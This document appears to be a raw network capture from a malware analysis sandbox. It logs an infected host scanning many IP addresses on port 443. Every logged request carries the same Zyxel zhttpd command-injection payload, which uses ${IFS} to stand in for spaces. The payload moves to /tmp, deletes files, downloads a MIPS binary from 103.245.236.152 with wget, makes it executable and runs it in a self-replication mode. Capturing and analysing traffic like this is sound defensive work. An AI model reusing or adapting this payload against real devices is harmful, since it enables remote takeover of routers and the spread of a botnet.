                                      Jan 14, 2024 15:50:39.120389938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2458192.168.2.1439910115.118.65.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.120431900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2459192.168.2.1458192106.139.123.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.120469093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2460192.168.2.144601290.107.155.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.120501041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2461192.168.2.1445830189.73.173.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.120538950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2462192.168.2.145467437.61.155.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.120568991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2463192.168.2.1449236104.105.243.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.120593071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2464192.168.2.1459880210.85.201.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.120630980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2465192.168.2.1450494112.248.80.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.120675087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2466192.168.2.144883825.186.6.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.120723963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2467192.168.2.144365857.27.182.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.120755911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2468192.168.2.1454198158.210.71.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.120820999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2469192.168.2.145207089.220.184.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.120840073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2470192.168.2.1434666216.158.18.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.120889902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2471192.168.2.143900645.178.192.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.120920897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2472192.168.2.145726863.179.78.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.120953083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2473192.168.2.144005246.39.212.238443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.121007919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2474192.168.2.1446376114.40.244.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.121051073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2475192.168.2.1435638130.125.91.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.121076107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2476192.168.2.1446630124.144.224.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.121109009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2477192.168.2.145414453.236.225.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.121140957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2478192.168.2.1433308210.114.239.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.121165991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2479192.168.2.145597862.137.178.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.121213913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2480192.168.2.1433816191.149.206.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.121258020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2481192.168.2.1458782161.198.216.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.121295929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2482192.168.2.1456478147.171.142.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.121351004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2483192.168.2.143661852.196.202.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.121407032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2484192.168.2.143323061.156.205.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.121407032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2485192.168.2.1451290101.89.79.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.121448040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2486192.168.2.144450477.253.42.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.121506929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2487192.168.2.1458700128.199.141.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.121552944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2488192.168.2.1445378107.111.227.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.121587992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2489192.168.2.1454370172.150.28.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.121609926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2490192.168.2.1449422123.95.250.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.121660948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2491192.168.2.1446686141.142.112.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.121702909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2492192.168.2.145892059.69.176.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.121741056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2493192.168.2.145501287.182.173.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.121772051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2494192.168.2.1455590141.52.63.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.121805906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2495192.168.2.1454890152.44.76.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.121849060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2496192.168.2.1446322195.231.219.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.121881008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2497192.168.2.1448660187.20.171.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.121901989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2498192.168.2.145553062.8.209.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.121942997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2499192.168.2.1433900143.9.6.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.121978998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2500192.168.2.143721489.225.27.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.122016907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2501192.168.2.144757458.214.122.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.122047901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2502192.168.2.144275020.127.129.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.122092962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2503192.168.2.1441460138.102.226.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.122138977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2504192.168.2.1442768175.163.254.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.122174978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2505192.168.2.143423072.159.254.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.122205973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2506192.168.2.144739858.45.234.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.122250080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2507192.168.2.1447282130.234.111.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.122289896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2508192.168.2.143469676.87.22.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.122323036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2509192.168.2.1450748197.92.124.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.122371912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2510192.168.2.1439614216.228.59.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.122421026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2511192.168.2.1458238184.150.201.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.122451067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2512192.168.2.1435880163.223.128.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.122502089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2513192.168.2.1457030105.9.140.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.122531891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2514192.168.2.1445380212.167.122.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.122577906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2515192.168.2.1458106182.197.76.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.122601986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2516192.168.2.146072439.197.199.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.122654915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2517192.168.2.1447038218.132.197.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.122699976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2518192.168.2.143716890.252.238.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.122723103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2519192.168.2.1450702106.210.107.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.122761965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2520192.168.2.1455878146.161.114.161443
                                      TimestampBytes transferredDirectionData
